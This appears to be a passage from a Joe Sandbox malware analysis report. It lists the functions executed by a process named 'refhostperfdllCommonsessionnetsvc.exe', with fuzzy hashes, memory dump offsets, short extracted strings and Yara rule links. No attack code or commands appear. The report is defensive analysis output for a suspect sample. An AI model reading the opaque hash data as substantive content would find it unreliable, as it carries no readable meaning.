Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 858a43224103036d72de7848c2b0f60f579fb47c5986a9cc7971f0531ecb5f45
Instruction ID: 06798064c350e2c4ceefec3e14eb8f8c8d74bddacec00afff915bb89071be788
Opcode Fuzzy Hash: 858a43224103036d72de7848c2b0f60f579fb47c5986a9cc7971f0531ecb5f45
Instruction Fuzzy Hash: DCC01231285350B6E73016657D5DB436E4C7B11B12F09048DB2C1DE1C4D5AAC4808760

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: refhostperfdllCommonsessionnetsvc.exe PID: 744 Parent PID: 5360 refhostperfdllCommonsessionnetsvc.exeCOMMON

Executed Functions

Function 00007FFA3625ADAB, Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

T]_H, xrefs: 00007FFA3625A3CF
8, xrefs: 00007FFA3625ADB8

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: 8$T]_H
API String ID: 0-142934152
Opcode ID: 8c13fe0be2f1fb24cefaf88bfa2330be2ffbdd0244cbd9608ff95eeebd86f7ea
Instruction ID: 31c51e8d80933a36c4c791922e2860f6afe08850e30e0b04d40469ddf13fa68a
Opcode Fuzzy Hash: 8c13fe0be2f1fb24cefaf88bfa2330be2ffbdd0244cbd9608ff95eeebd86f7ea
Instruction Fuzzy Hash: 99312871E087198FEBB4DB6888567A8B7B1FB55300F4191FAD10DE3291DE356A80CF01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3625CDD4, Relevance: 2.5, Strings: 2, Instructions: 35COMMON

Download Yara Rule

Strings

, xrefs: 00007FFA3625CE23
/, xrefs: 00007FFA3625CF2D

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: $/
API String ID: 0-2637513485
Opcode ID: fd9c85f26d3b182dcf38de8ebad7385c2c0684002c837c2abeed20e9cf8a07ea
Instruction ID: 50c68299a095a8bb335f24d068ddf574b2117d80a39001775fa82e6a23446dca
Opcode Fuzzy Hash: fd9c85f26d3b182dcf38de8ebad7385c2c0684002c837c2abeed20e9cf8a07ea
Instruction Fuzzy Hash: EA019274E08A1D8FEBA4EB48C898BE8B7B1FB59301F1042AAD50DD7390DE346984DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260FA4, Relevance: 2.2, Strings: 1, Instructions: 966COMMON

Download Yara Rule

Strings

#S}, xrefs: 00007FFA3626128D

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: #S}
API String ID: 0-2721051066
Opcode ID: 3ea7948a1a75a97af307763814e025739e6bc2e37e3548c9241571f4493c2fc9
Instruction ID: 90549fed6ba3fd333b93e25723da6923584c22072856ea282efefec663a206e8
Opcode Fuzzy Hash: 3ea7948a1a75a97af307763814e025739e6bc2e37e3548c9241571f4493c2fc9
Instruction Fuzzy Hash: 9682C730D1861D8FEBA4EB58C899BA8B7B1FF69300F5191B9D04DD7292CE35A981DF01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36258338, Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

o_H, xrefs: 00007FFA36258C03

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: o_H
API String ID: 0-770704722
Opcode ID: 39f4cd894fd127dc7ae045fccd999d0423a60fde20cbe1074e4c41f2b7b3d524
Instruction ID: e9acb0b72e55044bfa4eac815799c1b09eea8613ee6d1d4600e439479d4874ee
Opcode Fuzzy Hash: 39f4cd894fd127dc7ae045fccd999d0423a60fde20cbe1074e4c41f2b7b3d524
Instruction Fuzzy Hash: 8C514770D0862D8EEBA8EB98C455BFDB7B1EF59300F41913AD50DE3381DE7968409B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36258B2C, Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

o_H, xrefs: 00007FFA36258C03

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: o_H
API String ID: 0-770704722
Opcode ID: 7ee802adc7b9e9209bac583aea3310f28cd095f0079cf82819f44e4cb2267c0f
Instruction ID: 26b0a142bc81c9365dc877dbcb57134c7e264584a9113962de2288b220e30fef
Opcode Fuzzy Hash: 7ee802adc7b9e9209bac583aea3310f28cd095f0079cf82819f44e4cb2267c0f
Instruction Fuzzy Hash: E5314970D08A2D9EEBA4EB988895BFCB7B1FF59300F416139D50DE3282DE7968419B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36263B29, Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

[_H, xrefs: 00007FFA36263BEF

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: [_H
API String ID: 0-244467742
Opcode ID: 1a434cb8572f469272d87d54ab9d19f180d2b692ff41e39bc815e32529e57025
Instruction ID: 7d1cde8e9f76f21204df21d350125c0cc7723fcb0c9bf91f610a0ef4c52ee20f
Opcode Fuzzy Hash: 1a434cb8572f469272d87d54ab9d19f180d2b692ff41e39bc815e32529e57025
Instruction Fuzzy Hash: 35315030D1C94E8FEB94DB94C851ABDBBB1FF66300F55617AD00EE7281DE696801DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36263730, Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

$&6, xrefs: 00007FFA36263744

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: $&6
API String ID: 0-411040247
Opcode ID: 7e20237bf609564908039a6a60af2d8e6b3585875ab27691abd45f1d9b0638df
Instruction ID: a9f0af815743e1c78a939c1c4e0133e59c7c67214df3689e77f9b682b06b55b2
Opcode Fuzzy Hash: 7e20237bf609564908039a6a60af2d8e6b3585875ab27691abd45f1d9b0638df
Instruction Fuzzy Hash: D421B1B1D0960A8FF798DB98C8959FE77F1EF29310F10513ED00AA7381CE6969458B94

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36255936, Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

=, xrefs: 00007FFA362559E3

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: =
API String ID: 0-2322244508
Opcode ID: 3e27364ccdc2ed2b97f885d4f6a592c7d8be96d9b097ccaa78798dedcf8ffe8c
Instruction ID: d65731e40c48be55666f98f88e6b4ab57e87d0ac755ddaec298d767070694b89
Opcode Fuzzy Hash: 3e27364ccdc2ed2b97f885d4f6a592c7d8be96d9b097ccaa78798dedcf8ffe8c
Instruction Fuzzy Hash: 6E314A70D0462A8FEB65DB14C840BE9F3B2BF8A310F1086E6C10DA7395DB356A818F80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3625A39E, Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

T]_H, xrefs: 00007FFA3625A3CF

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID: T]_H
API String ID: 0-1147892275
Opcode ID: cf6b2881140e8ea4790b0ddafbfff9015eed0ee7a57a70c67fe45f466c778694
Instruction ID: a96831156f5c646949bb2176dde2ac8cfcd87003b90345e25bb648a904ddef62
Opcode Fuzzy Hash: cf6b2881140e8ea4790b0ddafbfff9015eed0ee7a57a70c67fe45f466c778694
Instruction Fuzzy Hash: 4D21EAB1D187198FEBA4DB6888567A8B6F1FB59304F4151FAD10DE3292DE356A808F01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36259820, Relevance: .4, Instructions: 359COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ed4f48c662a7ee137b2f76da1d3f95befeb5c4d41c4fd1e715d469265e3e97b
Instruction ID: 2c3b6dd81fede0bc718e8d7de82a2550b8177781188270329ef92a215242c23c
Opcode Fuzzy Hash: 9ed4f48c662a7ee137b2f76da1d3f95befeb5c4d41c4fd1e715d469265e3e97b
Instruction Fuzzy Hash: 84D13E70D186598FEBA8DB98C895BF8BBF1FF59300F0481B9D00DA7292CE356885DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36259801, Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4249be298939a9f33343c73e857d69f73daf37852d137bc1801fdc26bdda54b8
Instruction ID: a28cc827293f768473e625d38a8b0183be3ea4b4ab0e01485ee0c040af74cf25
Opcode Fuzzy Hash: 4249be298939a9f33343c73e857d69f73daf37852d137bc1801fdc26bdda54b8
Instruction Fuzzy Hash: 65B13E71D186998FEBA8EB98C8557F8BBE1FF59300F0481B9D00DD7692CE356884DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260CCE, Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7027407f35c0f619a0ff8e74349948bfa873a4430a87152cd38f2d1784f36027
Instruction ID: c3ef72322c529e8ef3a41564527aa0ccb0819120271aa2b09575b5c213b40ce2
Opcode Fuzzy Hash: 7027407f35c0f619a0ff8e74349948bfa873a4430a87152cd38f2d1784f36027
Instruction Fuzzy Hash: 57A1A470D1891D8FDBA4EB58C894BE9B7B1FF69300F5081A9D00DE7292CE75AA81DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362643E1, Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff7b498290c606a166d854d12a0150fc6863cc94aa1567e4a6c32050cca7d60
Instruction ID: af9910438c505911e9892c4e8606e7c39478c481af067ac34ff02d70061aa299
Opcode Fuzzy Hash: 2ff7b498290c606a166d854d12a0150fc6863cc94aa1567e4a6c32050cca7d60
Instruction Fuzzy Hash: 2F712730D0C5498FEBE8DF48C8429B437D1FF6A311B16D279D49DC7791CEAAA8029790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36263071, Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3fc4392333dfca50181f299f164a8930d54e0a6ce0aa3045711206fbf7aa59f
Instruction ID: 2aea138d369f317acea192c33fdbaefb58993c7419d9d81c10bb326a205b3bd4
Opcode Fuzzy Hash: d3fc4392333dfca50181f299f164a8930d54e0a6ce0aa3045711206fbf7aa59f
Instruction Fuzzy Hash: 3E71E930D08A4D8FEB94EF98C894BA9BBF1FF69300F1151AAD00DD7296CE75A945CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3625D9A5, Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c97f5e249d0a53e22200ba0405087d0306e98f1655bf48fa24940a4ab3488ae
Instruction ID: 2a6e7eeb78bb3ee6765753c7ad606d9363274a52569b84cf932bb37465a5d189
Opcode Fuzzy Hash: 9c97f5e249d0a53e22200ba0405087d0306e98f1655bf48fa24940a4ab3488ae
Instruction Fuzzy Hash: B9710C70D0864D8FEBA4EBA8C895BA9B7B1FF59301F1081B9D50DE3291CE359881CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260719, Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35627b0df05b95cefcbf50b059d3d1cdb885699784fc05b0bc07bb2fd5e6832a
Instruction ID: 35fd75d6826d779f2102237d5237d339a0510d054200a1daf3380ba72a852da7
Opcode Fuzzy Hash: 35627b0df05b95cefcbf50b059d3d1cdb885699784fc05b0bc07bb2fd5e6832a
Instruction Fuzzy Hash: F3614C70D08A5D8FEBA4EB988855BE8B7B1FB66300F1191B9C00DE3292DF755985DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3625E519, Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 143c63f5ce5266fe3a6f558eaae0666ac2684088fb73264e00799503a407b6be
Instruction ID: 10740ce23f3a8932d036754b3c7b889f184bb780d7e02d3613e8917a7b4f25d8
Opcode Fuzzy Hash: 143c63f5ce5266fe3a6f558eaae0666ac2684088fb73264e00799503a407b6be
Instruction Fuzzy Hash: 8A611770D1861D9FEB60EBA8C855BECBBB1FF59300F4081BAD14DE3292DE3568859B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36262CA9, Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46891b7db51a83c273220f70963f6b151c99196093b6e855b6342beb1cf7b00b
Instruction ID: 7fa4f3a1eb736b3bebb8f01429dbe354b0162d73ff1f12fba7d565415c2e4e6d
Opcode Fuzzy Hash: 46891b7db51a83c273220f70963f6b151c99196093b6e855b6342beb1cf7b00b
Instruction Fuzzy Hash: FF517C70D1865D8FEBA9DB54C854BE9BBB0FF6A300F0041AAD40DE3292CF795A84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3625E382, Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3183989cd00ba99eafc312d43fa9ca58983bf8ee53746026d0208f974ab11b0
Instruction ID: 97385e19946afa4bd26142912fda0ef488a7666e5b1be12489b16452221e018f
Opcode Fuzzy Hash: d3183989cd00ba99eafc312d43fa9ca58983bf8ee53746026d0208f974ab11b0
Instruction Fuzzy Hash: 56313727B087285DD220B6EDF8855FEF794DBC6373B009977D28CC5902D965708E8AE1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3625DA9D, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48eecc99285dcf710a12cd3ce513fdbb81cf53092c5fc9120c32de4fab449f4c
Instruction ID: 6a66aad4decf297140682ccc1a1b79f1c3b9b683a573a5c73944eec482e707e9
Opcode Fuzzy Hash: 48eecc99285dcf710a12cd3ce513fdbb81cf53092c5fc9120c32de4fab449f4c
Instruction Fuzzy Hash: CF41F970E04A5D8FEBA4EB98C895BADB7B1FB99301F1080B9D50DD7351CE35A981CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36250F39, Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bafedd4469666c7499e0e3bc6040b5bcc6feed9a359e47522c5fafb00dc4e76
Instruction ID: 2cd565ebe7c52f1b9191d342d736ec3b8ff43ac22721d054b950350216649108
Opcode Fuzzy Hash: 0bafedd4469666c7499e0e3bc6040b5bcc6feed9a359e47522c5fafb00dc4e76
Instruction Fuzzy Hash: 00414670D086498FEB60EB94C858BFCBBF0EF0A310F41917AD50DE7292CE3A69559B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36258428, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b5a0c63b4d620959a3a2b5062859aa5c8f65dfc685eafbe2a2be6874bc1712a
Instruction ID: 531c14cad8104b871a91964508024bc55350d60ecc31e3df531fe4724952ba5e
Opcode Fuzzy Hash: 3b5a0c63b4d620959a3a2b5062859aa5c8f65dfc685eafbe2a2be6874bc1712a
Instruction Fuzzy Hash: 2B41E670D08A1D8EEBA4DF988854BECB7B1FB59300F1151BAD00DE3391DF7969819B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3625D67D, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0d40c7a3714a370018c57642a223e475ad01220308ff020678dd5fc74012f53
Instruction ID: 0ac9139d93169ded835002f6e962dedd9950335fc22d37538412e7a755eb84c3
Opcode Fuzzy Hash: b0d40c7a3714a370018c57642a223e475ad01220308ff020678dd5fc74012f53
Instruction Fuzzy Hash: 6B41987180E7C68FD7038B748C292917FB0AF17214B1A45EBD4C8CF1A3E6295A89C762

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260185, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21070dc35e49f42923e0aff6c2347023f98e3b55968543d4c47fd5fca8d53b08
Instruction ID: 1600dce1545d9f8b1c290b3acd6e8d53433345ebb443a06dc29ba87c5c17267d
Opcode Fuzzy Hash: 21070dc35e49f42923e0aff6c2347023f98e3b55968543d4c47fd5fca8d53b08
Instruction Fuzzy Hash: 2241A330C0C24A8FFBA19BA08555AFD7BB0EF66304F0191BAD04C962C2DFBD6545EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36250669, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26e27ab2e252e02f67088a675bdb5ada073a72c83b3bbacd1b9de2c60fba442d
Instruction ID: 5b0e450863ec13bbc2953420bf56000759fec84957a425286e46cf5982ee69d5
Opcode Fuzzy Hash: 26e27ab2e252e02f67088a675bdb5ada073a72c83b3bbacd1b9de2c60fba442d
Instruction Fuzzy Hash: B631B131D0C78D8FF7659BA88C596B8BFA0EF57300F0594B6E50DC7292DE295884C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260B09, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6453ccfa55434b4a3d8e72833ec609679c73070357819530ecd28091078fb356
Instruction ID: 9790a1688125dc93fcad3c088fc6c2542e8c40cd815f4546e33301990e197848
Opcode Fuzzy Hash: 6453ccfa55434b4a3d8e72833ec609679c73070357819530ecd28091078fb356
Instruction Fuzzy Hash: CB315C71D08A1E8EFBA4DB889845BE9B3B0FB25304F51D1A6D00DE3241DF766985AF80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3625E408, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70e24ea3fa23b310936aadb2af3575c41fcc277327770ad32a148cdfb030b2d2
Instruction ID: c189507afc08df5449024a863495f0fca7c1bcc1ead8f92cc0bc7e51ce8b7694
Opcode Fuzzy Hash: 70e24ea3fa23b310936aadb2af3575c41fcc277327770ad32a148cdfb030b2d2
Instruction Fuzzy Hash: 9121F637B087285ED620B7EDB8895FEF794DFC63B3B008577D24CC1402DA2570899AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36262F19, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a04007d07e288635214e6e28760ce01f86261e48e438db416904a1b60878e1cc
Instruction ID: 2cde9c8166272d4582bba92f7f493b5d2a48961cd771d2493a131c81ef2aef3c
Opcode Fuzzy Hash: a04007d07e288635214e6e28760ce01f86261e48e438db416904a1b60878e1cc
Instruction Fuzzy Hash: C1315331D0964D8FEBA4EFA8D854AEDBBB0FF5A300F01517AD40DE3292CA399945CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36250FE2, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cbb06888826706e7a271d8c7f5364b8453d8d57aa048afc0740716ce64bc835
Instruction ID: 0061b76c5c0e0cd9a9599f6f8e99f5c858e8ba4a2a135f9c64a68426aaa50de2
Opcode Fuzzy Hash: 5cbb06888826706e7a271d8c7f5364b8453d8d57aa048afc0740716ce64bc835
Instruction Fuzzy Hash: B021E270D0861D8FEBA4EB98C888AECBBF1EF59311F11917AD50DE7291CE396940DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362634A1, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a05aa15b07f1aa8c6e95c763412e27bce670c6ccdb8d82485446170591989cc
Instruction ID: ea3c1584215e8ace98921f72c665440c70ac73922ca388f031c919e2917e532e
Opcode Fuzzy Hash: 0a05aa15b07f1aa8c6e95c763412e27bce670c6ccdb8d82485446170591989cc
Instruction Fuzzy Hash: E7219031D0C6098FE754EBA4C855AFDBBA1FF6A310F01A23AD009D3281DEAA6400D741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626011F, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7151bf833a11b1fd7a8a1099b314752cc5106086a5f25ee587310e20c4d96f37
Instruction ID: d2494ee4de392cf6d2d55dd2d90515900974c8809cb3ba3472538863281c1c5e
Opcode Fuzzy Hash: 7151bf833a11b1fd7a8a1099b314752cc5106086a5f25ee587310e20c4d96f37
Instruction Fuzzy Hash: A2119074D1864D8FEB90EF98D845AEDBBE0FF55314F00467AE80CD3282DB75A9558740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36262E83, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.715633943.00007FFA36250000.00000040.00000001.sdmp, Offset: 00007FFA36250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffa36250000_refhostperfdllCommonsessionnetsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b70372c1da6a7a510ce5f8e4a27125ec9155fe55c8b271c0f29f8d9e0cb7fe7
Instruction ID: a19ad0b40c0a8f5859c94b69a29dbf936f61305dd74c31625d7cc1264ce4feb7
Opcode Fuzzy Hash: 6b70372c1da6a7a510ce5f8e4a27125ec9155fe55c8b271c0f29f8d9e0cb7fe7
Instruction Fuzzy Hash: 94113322D0E5564AFBA177F968024FC2A80DF33760F11E436E54C452D78E9E74846B6D

Uniqueness

Uniqueness Score: -1.00%

